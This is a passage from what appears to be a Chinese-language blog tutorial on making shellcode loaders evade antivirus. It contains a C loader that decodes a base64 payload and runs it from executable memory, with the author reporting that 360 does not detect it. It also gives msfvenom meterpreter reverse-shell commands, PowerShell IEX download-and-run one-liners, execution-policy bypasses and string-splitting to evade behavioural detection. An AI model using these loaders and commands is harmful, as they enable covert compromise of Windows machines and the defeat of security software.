		bufin += 4;
		nprbytes -= 4;
	}
	/* Note: (nprbytes == 1) would be an error, so just ingore that case */
	if (nprbytes > 1) {
		*(bufout++) =
			(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
	}
	if (nprbytes > 2) {
		*(bufout++) =
			(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
	}
	if (nprbytes > 3) {
		*(bufout++) =
			(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
	}
	*(bufout++) = '\0';
	nbytesdecoded -= (4 - nprbytes) & 3;
	return nbytesdecoded;
}
static const char basis_64[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
int Base64encode_len(int len)
{
	return ((len + 2) / 3 * 4) + 1;
}
int Base64encode(char* encoded, const char* string, int len)
{
	int i;
	char* p;
	p = encoded;
	for (i = 0; i < len - 2; i += 3) {
		*p++ = basis_64[(string[i] >> 2) & 0x3F];
		*p++ = basis_64[((string[i] & 0x3) << 4) |
			((int)(string[i + 1] & 0xF0) >> 4)];
		*p++ = basis_64[((string[i + 1] & 0xF) << 2) |
			((int)(string[i + 2] & 0xC0) >> 6)];
		*p++ = basis_64[string[i + 2] & 0x3F];
	}
	if (i < len) {
		*p++ = basis_64[(string[i] >> 2) & 0x3F];
		if (i == (len - 1)) {
			*p++ = basis_64[((string[i] & 0x3) << 4)];
			// *p++ = '=';
		}
		else {
			*p++ = basis_64[((string[i] & 0x3) << 4) |
				((int)(string[i + 1] & 0xF0) >> 4)];
			*p++ = basis_64[((string[i + 1] & 0xF) << 2)];
		}
		//*p++ = '=';
	}
	*p++ = '\0';
	return p - encoded;
}

base64.h

#ifndef _BASE64_H_
#define _BASE64_H_
#ifdef __cplusplus
extern "C" {
#endif
	int Base64encode_len(int len);
	int Base64encode(char* coded_dst, const char* plain_src, int len_plain_src);
	int Base64decode_len(const char* coded_src);
	int Base64decode(char* plain_dst, const char* coded_src);
#ifdef __cplusplus
}
#endif

#endif //_BASE64_H_

shellcode.c

#include <Windows.h>
#include <stdio.h>
#include <string.h>
#include "base64.h"
unsigned char buf[] =
"\x2f\x4f\x69\x50\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x64\x4a"
"\x6b\x69\x31\x49\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33"
"\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x4d\x63\x43\x73\x50"
"\x47\x46\x38\x41\x69\x77\x67\x77\x63\x38\x4e\x41\x63\x64\x4a"
"\x64\x65\x39\x53\x56\x34\x74\x53\x45\x49\x74\x43\x50\x41\x48"
"\x51\x69\x30\x42\x34\x68\x63\x42\x30\x54\x41\x48\x51\x69\x30"
"\x67\x59\x69\x31\x67\x67\x55\x41\x48\x54\x68\x63\x6c\x30\x50"
"\x45\x6b\x78\x2f\x34\x73\x30\x69\x77\x48\x57\x4d\x63\x44\x42"
"\x7a\x77\x32\x73\x41\x63\x63\x34\x34\x48\x58\x30\x41\x33\x33"
"\x34\x4f\x33\x30\x6b\x64\x65\x42\x59\x69\x31\x67\x6b\x41\x64"
"\x4e\x6d\x69\x77\x78\x4c\x69\x31\x67\x63\x41\x64\x4f\x4c\x42"
"\x49\x73\x42\x30\x49\x6c\x45\x4a\x43\x52\x62\x57\x32\x46\x5a"
"\x57\x6c\x48\x2f\x34\x46\x68\x66\x57\x6f\x73\x53\x36\x59\x44"
"\x2f\x2f\x2f\x39\x64\x61\x44\x4d\x79\x41\x41\x42\x6f\x64\x33"
"\x4d\x79\x58\x31\x52\x6f\x54\x48\x63\x6d\x42\x34\x6e\x6f\x2f"
"\x39\x43\x34\x6b\x41\x45\x41\x41\x43\x6e\x45\x56\x46\x42\x6f"
"\x4b\x59\x42\x72\x41\x50\x2f\x56\x61\x67\x70\x6f\x77\x4b\x6a"
"\x64\x67\x47\x67\x43\x41\x42\x46\x63\x69\x65\x5a\x51\x55\x46"
"\x42\x51\x51\x46\x42\x41\x55\x47\x6a\x71\x44\x39\x2f\x67\x2f"
"\x39\x57\x58\x61\x68\x42\x57\x56\x32\x69\x5a\x70\x58\x52\x68"
"\x2f\x39\x57\x46\x77\x48\x51\x4b\x2f\x30\x34\x49\x64\x65\x7a"
"\x6f\x5a\x77\x41\x41\x41\x47\x6f\x41\x61\x67\x52\x57\x56\x32"
"\x67\x43\x32\x63\x68\x66\x2f\x39\x57\x44\x2b\x41\x42\x2b\x4e"
"\x6f\x73\x32\x61\x6b\x42\x6f\x41\x42\x41\x41\x41\x46\x5a\x71"
"\x41\x47\x68\x59\x70\x46\x50\x6c\x2f\x39\x57\x54\x55\x32\x6f"
"\x41\x56\x6c\x4e\x58\x61\x41\x4c\x5a\x79\x46\x2f\x2f\x31\x59"
"\x50\x34\x41\x48\x30\x6f\x57\x47\x67\x41\x51\x41\x41\x41\x61"
"\x67\x42\x51\x61\x41\x73\x76\x44\x7a\x44\x2f\x31\x56\x64\x6f"
"\x64\x57\x35\x4e\x59\x66\x2f\x56\x58\x6c\x37\x2f\x44\x43\x51"
"\x50\x68\x58\x44\x2f\x2f\x2f\x2f\x70\x6d\x2f\x2f\x2f\x2f\x77"
"\x48\x44\x4b\x63\x5a\x31\x77\x63\x4f\x37\x38\x4c\x57\x69\x56"
"\x6d\x6f\x41\x55\x2f\x2f\x56";
int main(int argc, const char* argv[]) {
	char str1[1000] = { 0 };
	Base64decode(str1, buf);
	//printf("%d ", sizeof(str3));
	char* Memory;
	Memory = VirtualAlloc(NULL, sizeof(str1), MEM_COMMIT | MEM_RESERVE,
		PAGE_EXECUTE_READWRITE);
	memcpy(Memory, str1, sizeof(str1));
	((void(*)())Memory)();
	return 0;
}

编译生成exe

msf上线

360动态静态均未查杀

C#

方法

1. C#源码+shellcode直接编译
2. 使用加载器加载C#代码，白名单程序加载，比如csc.exe

---

PS：由于win7环境问题，Vs2019编译出来的exe无法执行，后续调整后再补上 。但是思路和C/C++大同小异：用脚本对C#格式的shellcode进行加密编译生成exe；用ShellcodeWrapper加密生成的C#代码编译生成exe；

Python

方法

1. python编译shellcode（python+C，base64编码，xor加密，AES加密）
2. python加载器

环境问题，待补

Powershell

基础知识

常见执行方式

1. 网络环境直接执行代码，可以加载远程脚本
2. 本地执行，需要把ps1脚本下载到本地执行

执行策略

查看执行策略powershell Get-ExecutionPolicy

六种执行策略：

Unrestricted 权限最⾼，可以不受限制执⾏任意脚本

Restricted 默认策略，不允许任意脚本的执⾏

AllSigned 所有脚本必须经过签名运⾏

RemoteSigned 本地脚本⽆限制，但是对来⾃⽹络的脚本必须经过签名

Bypass 没有任何限制和提示

Undefined 没有设置脚本的策略

默认情况下是禁止脚本执行的，管理员可以通过powershell Set-ExecutionPolicy Unrestricted设置执行策略

绕过执行策略的方法：

• 本地读取后通过管道符运行

  powershell Get-Content 1.ps1 | powershell -NoProfile -

• 远程下载并通过IEX运行脚本

  powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://[your id]/ps/a.ps1')"

• Bypass执行策略

  powershell -ExecutionPolicy bypass -File ./a.ps1

• Unrestricted执行策略标志

  powershell -ExecutionPolicy unrestricted -File ./a.ps1

ps1本地执行

msfvenom -p windows/x64/meterpreter/reverse_https -e x86/shikata_ga_nai -i 10 -b '\x00' lhost=192.168.221.128 lport=4444 -f psh -o shell.ps1

把生成的ps1脚本放到win7本地执行

powershell.exe -ExecutionPolicy Bypass -NoExit -File shell.ps1

360动静态都可查杀

PS：msf编码次数过多容易报错，但是少了容易被查杀，都是有可能的

Invoke-Shellcode加载

Powersploit是一款基于powershell的渗透框架

Invoke-Shellcode可以将 shellcode 注入您选择的进程 ID 或本地 PowerShell 中

利用流程如下：

1. IEX远程下载Invoke-Shellcode.ps1或者在Kali上安装搭建powersploit用于下载脚本
2. msf生成powershell脚本并监听
3. IEX远程下载msf脚本
4. 用Invoke-Shellcode运行脚本

IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1")

IEX(New-Object Net.WebClient).DownloadString("http://IP/shell.ps1")

Invoke-Shellcode -Shellcode ($buf) -Force

Invoke-Obfuscation

Invoke-Obfuscation是一个用来对powershell脚本编码免杀的工具，之前在做内网渗透靶场的时候用到过，具体使用可见另一篇博客

生成powershell马

msfvenom -p windows/x64/meterpreter/reverse_https -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.221.128 lport=4444 -f psh -o shell.ps1

运行Invoke-Obfuscation

设置好脚本路径，设置编码方式，编码完成后输出脚本文件即可

免杀效果不如之前了，换了好几种编码方式都被杀了

ps1行为免杀

powershell执行远程下载或者执行shellcode容易触发行为检测

可以尝试对DownloadString、http等敏感词进行替换拼接，如

powershell -NoExit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://ip/shell.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

经测试replace也会被行为检测，但这作为思路保留也还是可以尝试其他方法

小结

Powershell的行为被盯得比较紧，最好还是与其他免杀方法结合来使用，直接用powershell执行大概率会被问询

Go

方法

1. 将shellcode嵌入go代码编译成exe
2. 使用go的加载器

golang编译shellcode脚本网上可以找找，思路和上面几种语言一样就不测试了

go-shellcode加载器

git clone https://github.com/brimstone/go-shellcode
cd go-shellcode/cmd/sc
go build

生成HEX格式shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o shell.hex LHOST=192.168.221.128 LPORT=4444

在linux或者windows里编译都行，直接sc shellcode或sc.exe shellcode执行

360对sc并没有查杀，执行也没有查杀，但是msf收不到meterpreter一直挂，目前没有解决

Ruby

ruby加载shellcode

没有找到ruby的加载器，操作详见链接，win7上没有ruby环境，在实际场景中目标服务器有ruby可以尝试使用，还是比较冷门的，工具中用ruby编译的也比较少

总结

通过各种语言结合编码混淆的方式对shellcode进行自编译，免杀效果比工具篇中直接用工具进行免杀的效果更好，学习测试过程中还是存在不少问题没有解决和理解，还是需要更多的使用经验和积累

空的部分先挖个坑